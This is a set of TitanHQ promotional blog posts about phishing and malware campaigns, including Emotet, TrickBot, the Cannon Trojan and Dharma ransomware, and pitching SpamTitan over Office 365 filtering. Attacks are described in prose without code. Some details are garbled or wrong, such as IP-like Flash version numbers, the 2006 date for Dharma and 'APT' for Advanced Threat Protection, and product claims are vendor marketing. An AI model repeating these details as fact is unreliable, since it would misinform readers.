Improve Office 365 Security with a Third-Party Spam Filter
As previously mentioned, hackers can test their phishing emails to find out if they bypass Office 365 anti-phishing controls and your organization can be identified as using Office 365. To improve Office 365 security and reduce the number of phishing emails that are delivered to end users’ inboxes, consider implementing a third-party spam filter rather than relying on Microsoft’s anti-phishing controls. Dedicated email security vendors, such as TitanHQ, offer more effective and more flexible anti-spam and anti-phishing solutions than Microsoft Advanced Threat Protection at a lower cost.
A U.S. school system had Office 365 spam filtering controls in place and other cybersecurity solutions installed, but still experienced a costly 6-week malware infection. In this post we explore what went wrong and how you can improve security in your organization.
Multi-Layered Defenses Breached
If you want to mount a solid defense and prevent hackers from gaining access to your networks and data, multi-layered cybersecurity defenses are required, but for one Georgia school district that was not enough. On paper, their defenses looked sound. Office 365 spam filtering controls had been applied to protect the email system, the school district had a firewall appliance protecting the network, and a web filter had been installed to control what users could do online. Endpoint security had also been installed.
The school district was also updating its desktops to Windows 10 and its servers to Windows Server 2012 or later. Everything looked nice and secure.
However, the transportation department delayed the upgrades. The department was still sharing files on a local Windows 2003 server and some of the desktops were still running Windows XP, even though support for the OS had long since ended. The outdated software and lack of patching was exploited by the attackers.
How Was the Malware Installed?
The investigation has not yet determined exactly how the attack was initiated, but it is believed that it all started with an email. As a result of the actions of an end user, a chain of events was triggered that resulted in a 6-week struggle to mitigate the attack, the cost of which – in terms of time and resources – was considerable.
The attack is believed to have started on a Windows XP machine with SMBv1 enabled. That device had drives mapped to the Windows 2003 server. The malware that was installed was the Emotet Trojan, which used the EternalBlue exploit to spread across the network to other vulnerable devices. The attackers were able to gain control of those devices and installed cryptocurrency mining malware.
The cryptocurrency mining slowed the devices to such an extent that they were virtually unusable, causing many to continually crash and reboot. The network also slowed to a snail’s pace due to the streams of malicious traffic. While the upgraded Windows 10 machines were not affected initially, the attackers subsequently downloaded keyloggers onto the compromised devices and obtained the credentials of an IT support technician who had domain administration rights. The attackers then used those privileges to disable Windows Defender updates on desktops, servers, and domain controllers.
Over the course of a week, further Trojan modules were downloaded by creating scheduled tasks using the credentials of the IT support worker. A spam module was used to send malicious messages throughout the school district and several email accounts were compromised as a result and had malware downloaded. Other devices were infected through network shares. The TrickBot banking Trojan was downloaded and was used to attack the systems used by the finance department, although that Trojan was detected and blocked.
Remediation Took 6 Weeks
Remediating the attack was complicated. First the IT department disabled SMBv1 on all devices as it was not known what devices were vulnerable. Via a Windows Group Policy, the IT team then blocked the creation of scheduled tasks. Every device on the network had Windows Defender updates downloaded manually, and via autoruns for Windows, all processes and files run by the Trojan were deleted. The whole process of identifying, containing, and disabling the malware took 6 weeks.
The attack was made possible through an attack on a single user, although it was the continued use of unsupported operating systems and software that made the malware attack so severe.
The attack shows why it is crucial to ensure that IT best practices are followed and why patching is so important. For that to happen, the IT department needs to have a complete inventory of all devices and needs to make sure that each one is updated.
While Microsoft released a patch to correct the flaw in SMBv1 that was exploited through EternalBlue, the vulnerable Windows XP devices were not updated, even though Microsoft had released an update for the unsupported operating system in the spring of 2017.
Additional Protection is Required for Office 365 Inboxes
The attack also shows how the actions of a single user can have grave repercussions. By blocking malicious emails at source, attacks such as this will be much harder to pull off. While Office 365 spam filtering controls block many email-based threats, even with Microsoft’s Advanced Threat Protection many emails slip through and are delivered to inboxes.
Hackers can also see whether Office 365 is being used as it is broadcast through DNS MX records, which allows them to target Office 365 users and launch attacks.
Due to the additional cost of APT, the lack of flexibility, and the volume of malicious emails that are still delivered to inboxes, many businesses have chosen to implement a more powerful spam filtering solution on top of Office 365.
One such solution that has been developed to work seamlessly with Office 365 to improve protection against email threats is SpamTitan.
There has been an increase in phishing attacks on retailers, supermarket chains, and restaurants in recent weeks. The aim of the phishing attacks is to deliver remote access Trojans and remote manipulator software to gain persistent access to computers and, ultimately, obtain banking credentials and sensitive customer data on POS systems.
Several new campaigns have been detected in recent weeks targeting retail and food sector companies, both of which are well into the busiest time of the year. With employees working hard, it is likely that less care will be taken opening emails which gives cybercriminals an opportunity.
PUB Files Used in Phishing Attacks on Retailers
Over the past few weeks, security researchers have noted an uptick in phishing attacks on retailers, with one threat group switching to using.pub files to install malware. Many phishing attacks use Word documents containing malicious macros. The use of macros with .pub files is relatively uncommon. The change to this new attachment type may fool employees, as they will be less likely to associate these files with cyberattacks.
Social engineering techniques are used to fool end users into opening the files, with the .pub files masquerading as invoices. Many emails have been intercepted that appear to have been sent from within a company, which helps to make the files appear genuine.
If opened, the .pub files, via malicious macros, run Microsoft Installer (MSI) files that deliver a remote access Trojan. Since these installers will most likely be familiar to end users, they may not realize the installers are malicious. Further, the MSI files are time delayed so they do not run immediately when the .pub files are opened, increasing the probability that the RAT downloads will go unnoticed.
The TA505 threat group is using this tactic to install the FlawedAmmy remote access Trojan and other malicious payloads such as Remote Manipulator System (RMS) clients.
The phishing emails used to deliver these malicious files are targeted and tailored to a specific business to increase the likelihood of success. These targeted spear phishing attacks are now becoming the norm, as threat actors move away from the spray and pray tactics of old.
Cape Cod Community College Phishing Attack Results in Theft of More Than $800,000
Phishing attacks on retailers have increased, but other industries are also at risk. Educational institutions are also prime targets, as has been highlighted by a recent phishing attack on Cape Cod Community College.
The Cape Cod Community College phishing attack involved sophisticated messages that delivered malware capable of evading the college’s anti-virus software. The malware was used to obtain the banking credentials of the college, and once those credentials had been obtained, the hackers proceeded to make fraudulent transfers and empty bank accounts. Transfers totaling $807,130 were made, and so far, the college and its bank have only been able to recover $278,887.
All too often, fraudulent transfers are not detected quickly enough to recover any funds. Once the transfers have cleared the attacker-controlled bank accounts are emptied, after which the probability of recovering funds falls to near zero.
Defense in Depth the Key to Phishing Protection
Email is the primary vector used to phish for sensitive information and deliver malware to businesses. Regardless of whether businesses use local email systems or cloud-based email services such as Office 365, advanced spam filtering controls are required to block threats. For instance, SpamTitan blocks more than 99.9% of spam email and 100% of known malware. SpamTitan also uses heuristics, machine learning, and Bayesian analysis to identify previously unseen threats – One of the areas of weakness of Office 365’s anti-phishing defenses.
Network segmentation is also essential. Critical services must be separated to ensure that the installation of malware or ransomware on one device will not allow the attackers to gain access to the entire network. This is especially important for retailers and other businesses with POS systems. Network segmentation will help to keep POS systems and the financial data of customers secure.
Advanced endpoint protection solutions offer far greater protection than standard antivirus solutions and are less reliant on malware signatures. Standard AV solutions will only block known malware. With standard AV solutions, new malware variants can easily slip through the net.
End user security awareness training should be mandatory for all employees and training needs to be a continuous process. A once a year training session is no longer sufficient. Regular training throughout the year is required to ensure employees are made aware of the latest threats and tactics being used to gain access to login credentials and install malware.
For further information on improving email security to improve protection against phishing attacks, contact the TitanHQ team today.
Adobe has issued an unscheduled update to correct flaws in Adobe Flash Player, including a zero-day vulnerability that is currently being exploited in the wild by an APT threat group on targets in Russia. One target was a Russian healthcare facility that provides medical and cosmetic surgery services to high level civil servants of the Russian Federation.
The zero-day flaw is a use-after-free vulnerability – CVE-2018-15982 – which allows arbitrary code execution and privilege execution in Flash Player. A malicious Flash object runs malicious code on a victim’s computer which gives command line access to the system.
The vulnerability was discovered by security researchers at Gigamon ATR who reported the flaw to Adobe on November 29. Researchers at Qihoo 360 identified a spear phishing campaign that is being used to deliver a malicious document and associated files that exploit the flaw. The document used in the campaign was a forged employee questionnaire.
The emails included a .rar compressed file attachment which contained a Word document, the vulnerability, and the payload. If the .rar file is unpacked and the document opened, the user is presented with a warning that the document may be harmful to the computer. If the content is enabled, a malicious command is executed which extracts and runs the payload – A Windows executable file named backup.exe that is disguised as an NVIDIA Control Panel application. Backup.exe serves as a backdoor into a system. The malicious payload collects system information which is sent back to the attackers via HTTP POST. The payload also downloads and executes shell code on the infected device.
Qihoo 360 researchers have named the campaign Operation Poison Needles due to the identified target being a healthcare clinic. While the attack appears to be politically motivated and highly targeted, now that details of the vulnerability have been released it is likely that other threat groups will use exploits for the vulnerability in more widespread attacks.
It is therefore important for businesses that have Flash Player installed on some of their devices to update to the latest version of the software as soon as possible. That said, uninstalling Flash Player, if it is not required, is a better option given the number of vulnerabilities that are discovered in the software each month.
The vulnerability is present in Flash Player 184.108.40.206 and all earlier versions. Adobe has corrected the flaw together with a DLL hijacking vulnerability in version 220.127.116.11.
A new module has been added to TrickBot malware that adds point-of-sale (POS) data collection capabilities.
TrickBot is a modular malware that is being actively developed. In early November, TrickBot was updated with a password stealing module, but the latest update has made it even more dangerous, especially for hotels, retail outlets, and restaurants: Businesses that process large volumes of card payments.
The new module was identified by security researchers at Trend Micro who note that, at present, the module is not being used to record POS data such as credit/debit card numbers. Currently, the new TrickBot malware module is only collecting data about whether an infected device is part of a network that supports POS services and the types of POS systems in use. The researchers have not yet determined how the POS information will be used, but it is highly likely that the module is being used for reconnaissance. Once targets with networks supporting POS systems have been identified, they will likely be subjected to further intrusions.
The new module, named psfin32, is similar to a previous network domain harvesting module, but has been developed specifically to identify POS-related terms from domain controllers and basic accounts. The module achieves this by using LDAP queries to Active Directory Services which search for a dnsHostName that contains strings such as ‘pos’, ‘retail’, ‘store’, ‘micros’, ‘cash’, ‘reg’, ‘aloha’, ‘lane’, ‘boh’, and ‘term.’
The timing of the update, so close to the holiday period, suggests the threat actors are planning to take advantage of the increase in holiday trade and are gathering as much information as possible before the module is used to harvest POS data.
The recent updates to TrickBot malware have been accompanied by a malicious spam email campaign (identified by Brad Duncan) which is targeting businesses in the United States. The malspam campaign uses Word documents containing malicious macros that download the TrickBot binary.
Protecting against TrickBot and other information stealing malware requires a defense-in-depth approach to cybersecurity. The main attack vector used by the threat actors behind TrickBot is spam email, so it is essential for an advanced anti-spam solution to be deployed to prevent malicious messages from being delivered to end users’ inboxes. End user training is also essential to ensure employees are made aware of the danger of opening emails from unknown senders, launching suspicious email attachments, and clicking hyperlinks in those messages.
Antivirus solutions and endpoint security controls should also be deployed to identify and quarantine potentially malicious files in case malware makes it past perimeter defenses.
There is a more cost-effective alternative to Cisco OpenDNS that provides total protection against web-based threats at a fraction of the price of OpenDNS. If you are currently running OpenDNS or have yet to implement a web filtering solution, you can find out about this powerful web filtering solution in a December 5, 2018 webinar.
Cybersecurity defenses can be implemented to secure the network perimeter, but employees often take risks online that can lead to costly data breaches. The online activities of employees can easily result in malware, ransomware, and viruses being downloaded. Employees may also respond to malicious adverts (malvertising) or visit phishing websites where they are relieved of their login credentials.
Mitigating malware infections, dealing with ransomware attacks, and resolving phishing-related breaches have a negative impact on the business and the resultant data breaches can be incredibly costly. Consequently, the threat from web-based attacks cannot be ignored.
Fortunately, there is an easy solution that offers protection against web-based threats by carefully controlling the web content that their employees can access: A DNS-based web filter.
DNS-based web filtering requires no hardware purchases and no software downloads. Within around 5 minutes, a business will be able to control employee internet access and block web-based threats. Some DNS-based web filters such as OpenDNS can be costly, but there is a more cost-effective alternative to Cisco OpenDNS.
TitanHQ and Celestix Networks will be running a joint webinar to introduce an alternative to Cisco OpenDNS – The WebTitan-powered solution, Celestix WebFilter Cloud.
Celestix will be joined by Rocco Donnino, TitanHQ EVP of Strategic Alliances, and Senior Sales Engineer, Derek Higgins who will explain how the DNS-based filtering technology offers total protection from web-based threats at a fraction of the cost of OpenDNS.
The webinar will be taking place on Wednesday December 5, 2018 at 10:00 AM US Pacific Time
A previously unseen malware variant, dubbed the Cannon Trojan, is being used in targeted attacks on government agencies in the United States and Europe. The new malware threat has been strongly linked to a threat group known under many names – APT28, Fancy Bear, Sofacy, Sednet, Strontium – that has links to the Russian government.
The Cannon Trojan is being used to gather information on potential targets, collecting system information and taking screenshots that are sent back to APT28. The Cannon Trojan is also a downloader capable of installing further malware variants onto a compromised system.
The new malware threat is stealthy and uses a variety of tricks to avoid detection and hide communications with its C2. Rather than communicating over HTTP/HTTPS, like other malware variants used by APT28, the Cannon Trojan communicates via email over SMTPs and POP3S.
Once installed, an email is sent over SMTPS through port 465 and a further two email addresses are obtained through which the malware communicates with its C2 using the POP3S protocol to receive instructions and send back data. While the use of email for communicating with a C2 is not unknown, it is relatively rare. One advantage offered by this method of communication is it is more difficult to identify and block that HTTP/HTTPS.
The Cannon Trojan, like the Zebrocy Trojan which is also being used by APT28, is being distributed via spear phishing emails. Two email templates have been intercepted by Palo Alto Networks’ Unit 42 team, one of which takes advantage of interest in the Lion Air plane crash in Indonesia.
The Lion Air spear phishing campaign appears to provide information on the victims of the crash, which the email claims are detailed in an attached Word document titled Crash List (Lion Air Boeing 737).docx. The user must Enable Content to view the contents of the document. It is claimed that the document was created in an earlier version of Word and content must be enabled for the file to be displayed. Opening the email and enabling content would trigger the macro to run, which would then silently download the Cannon Trojan.
Rather than the macro running and downloading the payload straightaway, as an anti-analysis mechanism, the attackers use the Windows AutoClose tool to delay completion of the macro routine until the document is closed. Only then is the Trojan downloaded. Any sandbox that analyzes the document and exits before closing the document would be unlikely to identify it as malicious. Further, the macro will only run if a connection with the C2 is established. Even if the document is opened and content is enabled, the macro will not run without its C2 channel open.
The techniques used by the attackers to obfuscate the macro and hide communications make this threat difficult to detect. The key to preventing infection is blocking the threat at source and preventing it from reaching inboxes. The provision of end user training to help employees identify threats such as emails with attachments from unknown senders is also important.
Enhance Protection Against Zero-Day Malware and Spear Phishing
TitanHQ has developed a powerful anti-phishing and anti-spam solution that is effective at blocking advanced persistent threats and zero-day malware, which does not rely on signature-based detection methods. While dual anti-virus engines offer protection against 100% of known malware, unlike many other spam filtering solutions, SpamTitan uses a variant of predictive techniques to identify previously unseen threats and spear phishing attacks.
Greylisting is used to identify domains used for spamming that have yet to be blacklisted. All incoming emails are subjected to Bayesian analysis, and heuristics are used to identify new threats.
To further protect against phishing attacks, URIBL and SURBL protocols are used to scan embedded hyperlinks. SpamTitan also scans outbound mail to prevent abuse and identify attempted data theft.
For further information on SpamTitan, to book a product demonstration, or to sign up for a free trial of the full product, contact the TitanHQ team today.
Office 365 has many benefits, so it is no surprise that it is proving so popular with businesses, but one common complaint is the number of spam and malicious emails that sneak past Microsoft’s defenses. If you have a problem with spam and phishing emails still being delivered to your end users, there is an easy solution to improve the Office 365 spam filter and block more threats.
Office 365 Email Protection
More than 155 million commercial users are now on Office 365 and that figure is growing at a rate of around 3 million users per month. Unfortunately, the popularity of Office 365 has made it a target for hackers, who are testing their campaigns in their own Office 365 environments to make sure their malspam messages are delivered. Businesses using Office 365 are being sought out and attacked.
Microsoft has been proactively taking steps to improve the Office 365 spam filter to make it more effective at blocking spam and phishing attempts. Office 365 phishing protections have been improved and more malicious emails are now being blocked; however, even with the recent anti-phish enhancements, many businesses still have to deal with an unacceptable volume of spam, phishing emails are still reaching inboxes, and malware is sneaking past Office 365 protections.
Office 365 Spam Protection
Office 365 provides a reasonable level of protection from spam. You can expect Microsoft to block around 99% of all spam emails. While that figure is good, the 1% that are not blocked can amount to a sizeable number of emails. Around 4.5 billion email messages are sent each day and around 46% of those messages are spam. Each inbox may only receive a handful of spam messages but each message that has to be opened, checked, and dealt with by employees is a drain on productivity.
Office 365 Phishing Protection
Spam is a nuisance, but it does not typically pose a threat to businesses. Malspam on the other hand certainly does. Malspam is the name given to spam email that is used for malicious purposes, such as scam and phishing emails and when spam messages are used to distribute malware. This is an area where default Microsoft Office email protection falls short of requirements for many businesses.
Businesses using Office 365 as a hosted email solution are likely to have their email filtered using Exchange Online Protection (EOP). EOP is included in an Office 365 subscription and it does a reasonable job of blocking spam, phishing emails, and malware. Given the number of email-based attacks that are now being conducted by cybercriminals, and the high costs of dealing with those attacks, being ‘reasonably’ well protected from malspam is simply not good enough.
Many businesses have found that EOP blocks basic phishing attacks but comes up short at blocking more advanced email threats such as spear phishing and advanced persistent threats. EOP is best at blocking large scale phishing campaigns where attackers use huge email lists and ‘spray and pray’ tactics. These tried and tested techniques are becoming less effective thanks to improvements in spam filtering.
The relatively poor return on these scams has seen many threat actors invest more time in their campaigns and develop new methods of attack. There is a growing trend for more targeted attacks using more sophisticated phishing methods. EOP is not very effective at blocking these types of phishing attacks. One study conducted by Avanan showed 25% of phishing emails were delivered to inboxes and were not blocked by EOP. These targeted attacks are also being conducted on SMBs, not just on large enterprises.
To improve the Office 365 spam filter, you can upgrade to Advanced Threat Protection (APT), the second level of protection for Office 365 offered by Microsoft. The level of protection is much better with this paid service, although APT is still not effective at blocking zero-day threats and falls short of the level of protection provided by most third-party anti-spam and anti-phishing solutions for Office 365. A SE Labs study conducted in the summer of 2017 found that even with the additional level of protection, which is only available in the Office 365 E5 license tier, protection only ranked in the low-middle of the market.
Office 365 Malware Protection
An Osterman Research study showed EOP eliminates 100% of known malware threats but is not nearly as effective at identifying zero-day threats. New malware variants are now being released at a rate of around 350,000 a day, according to AV-TEST.
These new malware threats are a serious risk. If they are not detected as malicious and are delivered to inboxes, malicious attachments can be opened by employees. You can train your workforce to be more security aware, but it is unreasonable to expect every employee to be able to identify every malicious message and act appropriately. Mistakes are inevitable. Those mistakes can be extremely costly. According to the 2019 Ponemon Institute/IBM Security Cost of a Data Breach Study, the global average cost of a data breach is $4.88 million and $8.19 million in the United States!
The number of cases of hackers exploiting vulnerabilities in Office 365 and the volume of direct attacks on Office 365 users have seen an increasing number of businesses turning to third-party email protection solutions for Office 365. These solutions are layered on top of EOP and greatly improve Office 365 spam filter capabilities.
There is another reason why it is wise to choose a third-party solution to improve Office 365 email protection rather than opting for Microsoft’s APT. It is important to have layered defenses to protect against cyberattacks, and while layers can be added through the same company, it pays not to put all your eggs in one basket. When businesses have their email on-premises, they typically have many layers to their defenses, and they do not all come from the same solution provider. If a threat is not detected by one solution provider, there is more chance of it being detected by another solution provider than another solution from the same company. The same thinking should be applied to your cloud-hosted Office 365 environment.
An Easy Way to Improve the Office 365 Spam Filter
Businesses that want to further improve the Office 365 spam filter (and those looking for an Office 365 Advanced Threat Protection alternative) need to consider implementing a third-party anti-spam solution.
Fortunately, there is a solution that will not only improve Office 365 spam filtering, it is quick and easy to implement, requires no software downloads, and no hardware purchases are necessary. In fact, it can be implemented, configured, and be up and running in a few minutes.
SpamTitan is a powerful cloud-based email security solution that has been developed to provide superior protection against spam, phishing, malware, zero-day attacks, and data loss via email.
In contrast to the Office 365 spam filter, SpamTitan uses predictive techniques such as Bayesian analysis, machine learning, and heuristics to block zero-day attacks, advanced persistent threats, new malware variants, and new spear phishing methods.
SpamTitan searches email headers, analyzes domains, and scans email content to identify phishing threats. Embedded hyperlinks, including shortened URLs, are scanned in real time and subjected to multiple URL reputation checks, while dual antivirus engines scan and block 100% of known malware. SpamTitan also includes sandboxing, where potentially malicious files and programs can be subjected to in-depth analysis in safety. In the sandbox, files are analyzed for malicious actions and C2 server callbacks.
SpamTitan also incorporates data loss prevention tools for emails and attachments, which are not available with EOP. Users can create tags for keywords and data elements such as Social Security numbers to protect against theft by insiders. SpamTitan also serves as a backup for your mail server to ensure business continuity.
With SpamTitan you get a greater level of protection against spam and malicious emails, a higher spam catch rate (over 99.9%), greater granularity, improved control over outbound email, and better business continuity protections.
If you have transitioned to Office 365 yet are still having problems with spam, phishing, and other malicious emails, or if you are an MSP that wants to offer your clients enhanced Office 365 email security, contact the TitanHQ team today.
The TitanHQ team will be happy to schedule a personalized product demonstration and help you put SpamTitan through the paces in your own environment in a no-obligation free trial.
FAQs on Improving the Office 365 Spam Filter
How does SpamTitan differ from the Office 365 spam filter?
SpamTitan has many advanced features not included in Office 365 and provides a defense in depth approach against malware, phishing and other email threats. SpamTitan include predictive techniques such as Bayesian analysis, heuristics, and machine learning to block new threats, dual AV engines and sandboxing to block malware threats, data leak prevention measures, dedicated RBLs as standard, and allows customized policies to be created for users, domains, domain groups, and the overall system, along with many more features to improve protection for Office 365 environments.
How does sandboxing work?
SpamTitan incorporates a powerful, next-generation sandbox solution. Suspicious messages that pass initial checks are sent to the sandbox for in-depth analysis to identify any malicious actions such as C2 callbacks. If these checks are passed, the message is delivered, if malicious activity is detected, the message will be quarantined or deleted, depending on the policy set by the administrator. Sandboxing is essential for blocking zero-day malware threats.
Why is it necessary to scan outbound emails?
If spam or malicious emails are sent from your mailboxes, you are likely to have your IP added to a spam blacklist and your emails may not be delivered. Outbound scanning can quickly detect a compromised inbox or rogue employee and block outbound emails before any harm is caused. Rules can be set to prevent certain attachments from being sent and data elements can be tagged to protect against data leaks.
How does SpamTitan protect against email spoofing attacks?
SpamTitan supports DKIM signing and incorporates the DMARC (Domain-based Message Authentication, Reporting and Conformance) email-validation system, which has been designed to detect and block email spoofing attacks. A DNS TXT record is used to create an overall policy governing SPF and DKIM, allowing you to accept messages, quarantine them, or reject them if they fail the DMARC check.
How much does SpamTitan Cost and are there any discounts?
The cost of SpamTitan varies depending on the number of mailboxes you want to protect and the length of the contract, with sizable discounts offered to organizations that commit to a 2- or 3-year term. The easiest way to find out how much SpamTitan is likely to cost is to use our cost calculator.
A new Dharma ransomware variant has been developed that is currently evading detection by the majority of antivirus engines. According to Heimdal Security, the latest Dharma ransomware variant captured by its researchers was only detected as malware by one of the 53 AV engines on VirusTotal.
Dharma ransomware (also known as CrySiS) first appeared in 2006 and is still being developed. This year, several new Dharma ransomware variants have been released, each using new file extensions for encrypted files (.bip, .xxxxx, .like, java, .arrow, .gamma, .arena, .betta, and .tron to name but a few). In the past two months alone four new Dharma ransomware variants have been detected.
The threat actors behind Dharma ransomware have claimed many victims in recent months. Successful attacks have been reported recently by Altus Baytown Hospital in Texas, the Arran brewery in Scotland, and the port of San Diego.
While free decryptors for Dharma ransomware have been developed, the constant evolution of this ransomware threat rapidly renders these decryptors obsolete. Infection with the latest variants of the ransomware threat only give victims three options: pay a sizeable ransom to recover files, restore files from backups, or face permanent file loss.
The latter is not an option given the extent of files that are encrypted. Restoring files from backups is not always possible as Dharma ransomware can also encrypt backup files and can delete shadow copies. Payment of a ransom is not advised as there is no guarantee that files can or will be decrypted.
Protecting against ransomware attacks requires a combination of policies, procedures, and cybersecurity solutions. Dharma ransomware attacks are mostly conducted via two attack vectors: The exploitation of Remote Desktop protocol (RDP) and via email malspam campaigns.
The latest Dharma ransomware variant attacks involve an executable file being dropped by a .NET file and HTA file. Infections occur via RDP-enabled endpoints using brute force attempts to guess passwords. Once the password is obtained, the malicious payload is deployed.
While it is not exactly clear how the Arran brewery attack occurred, a phishing attack is suspected. Phishing emails had been received just before file encryption. “We cannot be 100 percent sure that this was the vector that infection occurred through, but the timing seems to be more than coincidental,” said Arran Brewery’s managing director Gerald Michaluk.
To protect against RDP attacks, RDP should be disabled unless it is absolutely necessary. If RDP is required, access should only be possible through a VPN and strong passwords should be set. Rate limiting on login attempts should be configured to block login attempts after a set number of failures.
Naturally, good backup policies are essential. They will ensure that file recovery is possible without payment of a ransom. Multiple copies of backups should be made with one copy stored securely off site.
To protect against email-based attacks, an advanced spam filter is required. Spam filters that rely on AV engines may not detect the latest ransomware variants. Advanced analyses of incoming messages are essential.
SpamTitan can improve protection for businesses through combination of two AV engines and predictive techniques to block new types of malware whose signatures have not yet been uploaded to AV engines.
For further information on SpamTitan and protecting your email gateway from ransomware attacks and other threats, speak to TitanHQ’s security experts today.
Phishing is the number one security threat faced by businesses. In this post we explore why phishing is such as serious threat and the top phishing lures that are proving to be the most effective at getting employees to open malicious attachments and click on hyperlinks and visit phishing websites.
Phishing is the Biggest Security Threat Faced by Businesses
Phishing is a tried and tested social engineering technique that is favored by cybercriminals for one very simple reason. It is very effective. Phishing emails can be used to fool end users into installing malware or disclosing their login credentials. It is an easy way for hackers to gain a foothold in a network to conduct further cyberattacks on a business.
Phishing works because it targets the weakest link in security defenses: End users. If an email is delivered to an inbox, there is a relatively high probability that the email will be opened. Messages include a variety of cunning ploys to fool end users into taking a specific action such as opening a malicious email attachment or clicking on an embedded hyperlink.
Listed below are the top phishing lures of 2018 – The messages that have proven to be the most effective at getting end users to divulge sensitive information or install malware.
Top Phishing Lures of 2018
Determining the top phishing lures is not straightforward. Many organizations are required to publicly disclose data breaches to comply with industry regulations, but details of the phishing lures that have fooled employees are not usually made public.
Instead, the best way to determine the top phishing lures is to use data from security awareness training companies. These companies have developed platforms that businesses can use to run phishing simulation exercises. To obtain reliable data on the most effective phishing lures it is necessary to analyze huge volumes of data. Since these phishing simulation platforms are used to send millions of dummy phishing emails to employees and track responses, they are useful for determining the most effective phishing lures.
In the past few weeks, two security awareness training companies have published reports detailing the top phishing lures of 2018: Cofense and KnowBe4.
Top Phishing Lures on the Cofense Platform
Cofense has created two lists of the top phishing lures of 2018. One is based on the Cofense Intelligence platform which collects data on real phishing attacks and the second list is compiled from responses to phishing simulations.
Both lists are dominated by phishing attacks involving fake invoices. Seven out of the ten most effective phishing campaigns of 2018 mentioned invoice in the subject line. The other three were also finance related: Payment remittance, statement and payment. This stands to reason. The finance department is the primary target in phishing attacks on businesses.
The list of the top phishing lures from phishing simulations were also dominated by fake invoices, which outnumbered the second most clicked phishing lure by 2 to 1.
Number of Reported Emails
New Message in Mailbox
Online Order (Attachment)
Secure Message (MS Office Macro)
Online Order (Hyperlink)
Confidential Scanned document (Attachment)
Conversational Wire transfer (BEC Scam)
Top Phishing Lures on the KnowBe4 Platform
KnowBe4 has released two lists of the top phishing lures of Q3, 2018, which were compiled from responses to simulated phishing emails and real-world phishing attempted on businesses that were reported to IT security departments.
The most common real-world phishing attacks in Q3 were:
You have a new encrypted message
IT: Syncing Error – Returned incoming messages
HR: Contact information
FedEx: Sorry we missed you.
Microsoft: Multiple log in attempts
IT: IMPORTANT – NEW SERVER BACKUP
Wells Fargo: Irregular Activities Detected on Your Credit Card
LinkedIn: Your account is at risk!
Microsoft/Office 365: [Reminder]: your secured message
Coinbase: Your cryptocurrency wallet: Two-factor settings changed
The most commonly clicked phishing lures in Q3 were:
% of Emails Clicked
Password Check Required Immediately
You Have a New Voicemail
Your order is on the way
Change of Password Required Immediately
De-activation of [[email]] in Process
UPS Label Delivery 1ZBE312TNY00015011
Revised Vacation & Sick Time Policy
You’ve received a Document for Signature
Spam Notification: 1 New Messages
[ACTION REQUIRED] – Potential Acceptable Use Violation
The Importance of Blocking Phishing Attacks at their Source
If login credentials to email accounts, Office 365, Dropbox, and other cloud services are obtained by cybercriminals, the accounts can be plundered. Sensitive information can be stolen and Office 365/email accounts can be used for further phishing attacks on other employees. If malware is installed, cybercriminals can gain full control of infected devices. The cost of mitigating these attacks is considerable and a successful phishing attack can seriously damage a company’s reputation.
Due to the harm that can be caused by phishing, it is essential for businesses of all sizes to train staff how to identify phishing threats and implement a system that allows suspicious emails to be reported to security teams quickly. Resilience to phishing attacks can be greatly improved with an effective training program and phishing email simulations. It is also essential to deploy an effective email security solution that blocks threats and ensures they are not delivered to inboxes.
SpamTitan is a highly effective, easy to implement email filtering solution that blocks more than 99.9% of spam and phishing emails and 100% of known malware through dual anti-virus engines (Bitdefender and ClamAV). With SpamTitan protecting inboxes, businesses are less reliant on their employees’ ability to identify phishing threats.
SpamTitan subjects each incoming email to a barrage of checks to determine if a message is genuine and should be delivered or is potentially malicious and should be blocked. SpamTitan also performs checks on outbound emails to ensure that in the event that an email account is compromised, it cannot be used to end spam and phishing emails internally and to clients and contacts, thus helping to protect the reputation of the business.
Improve Office 365 Email Security with SpamTitan
There are more than 135 million subscribers to Office 365, and such high numbers make Office 365 a big target for cybercriminals. One of the main ways that Office 365 credentials are obtained is through phishing. Emails are crafted to bypass Office 365 defenses and hyperlinks are used to direct end users to fake Office 365 login pages where credentials are harvested.
Businesses that have adopted Office 365 are likely to still see a significant number of malicious emails delivered to inboxes. To enhance Office 365 security, a third-party email filtering control is required. If SpamTitan is installed on top of Office 365, a higher percentage of phishing emails and other email threats can be blocked at source.
To find out more about SpamTitan, including details of pricing and to register for a free trial, contact the TitanHQ team today. During the free trial you will discover just how much better SpamTitan is at blocking phishing attacks than standard Office 365 anti-spam controls.
A new Office 365 threat has been detected that stealthily installs malware by hiding communications and downloads by abusing legitimate Windows components.
New Office 365 Threat Uses Legitimate Windows Files to Hide Malicious Activity
The attack starts with malspam containing a malicious link embedded in an email. Various themes could be used to entice users into clicking the link, although one recent campaign masquerades as emails from the national postal service in Brazil.
The emails claim the postal service attempted to deliver a package, but the delivery failed as there was no one in. The tracking code for the package is included in the email and the user is requested to click the link in the email to receive the tracking information.
In this case, clicking the link will trigger a popup asking the user to confirm the download of a zip file, which it is alleged contains the tracking information. If the zip file is extracted, the user is required to click on a LNK file to receive the information. The LNK file runs cmd.exe, which executes a Windows Management Instrumentation (WMI) file: wmic.exe. This legitimate Windows file will be used to communicate with the attacker’s C2 server and will create a copy of another Windows file – certutil.exe in the %temp% folder with the name certis.exe. A script then runs which instructs the certis.exe file to connect to a different C2 server to download malicious files.
The aim of this attack is to use legitimate Windows files to download the malicious payload: A banking Trojan. The use of legitimate Windows files for communication and downloading files helps the attackers bypass security controls and install the malicious payload undetected.
These Windows files have the capability to download other files for legitimate purposes, so it is hard for security teams to identify malicious activity. This campaign targets users in Brazil, but this Office 365 threat should be a concern for all users as other threat actors have also adopted this tactic to install malware.
Due to the difficultly distinguishing between legitimate and malicious wmic.exe and certutil.exe activity, blocking an office 365 threat such as this is easiest at the initial point of attack: Preventing the malicious email from being delivered to an inbox and providing security awareness training to employees to help them identify this Office 365 threat. The latter is essential for all businesses. Employees can be turned into a strong last line of defense through security awareness training. The former can be achieved with a spam filtering solution such as SpamTitan. SpamTitan will prevent the last line of defense from being tested.
How to Block this Office 365 Threat with SpamTitan and Improve Email Security
Microsoft uses several techniques to identify malspam and prevent malicious messages from reaching users’ inboxes; however, while efforts have been made to improve the effectiveness of the spam filtering controls of Office 365, many malicious messages are still delivered.
To improve Office 365 security, a third-party spam filtering solution should be used. SpamTitan has been developed to allow easy integration into Office 365 and provides superior protection against a wide range of email threats.
SpamTitan uses a variety of methods to prevent malspam from being delivered to end users’ inboxes, including predictive techniques to identify threats that are misidentified by Office 365 security controls. These techniques ensure industry-leading catch rates in excess of 99.9% and prevent malicious emails from reaching inboxes.
